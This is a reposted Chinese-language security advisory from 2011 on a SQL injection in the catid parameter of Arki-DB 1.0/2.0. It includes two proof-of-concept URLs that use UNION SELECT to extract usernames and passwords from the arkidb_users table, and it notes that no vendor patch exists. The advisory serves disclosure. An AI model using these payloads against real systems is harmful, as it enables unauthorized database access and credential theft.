Arki-DB catid变量远程SQL注入漏洞

2011-2-23 9:52:16 来源:网络转载 浏览:137
Arki-DB catid变量远程SQL注入漏洞
影响版本:
Arki-DB 1.0/2.0

程序介绍:

Arki-DB是一款基于WEB的PHP编写的文件上传下载管理程序。

漏洞分析:

Arki-DB对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库。
Arki-DB的view.php脚本对用户提交catid参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。

漏洞利用:

Devil-00 (devil-00@s4a.cc)提供了如下测试方法:

http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
http://www.example.com/index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1

解决方案:
厂商补丁:
Arki-DB
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/arkidb/

(0)
(0)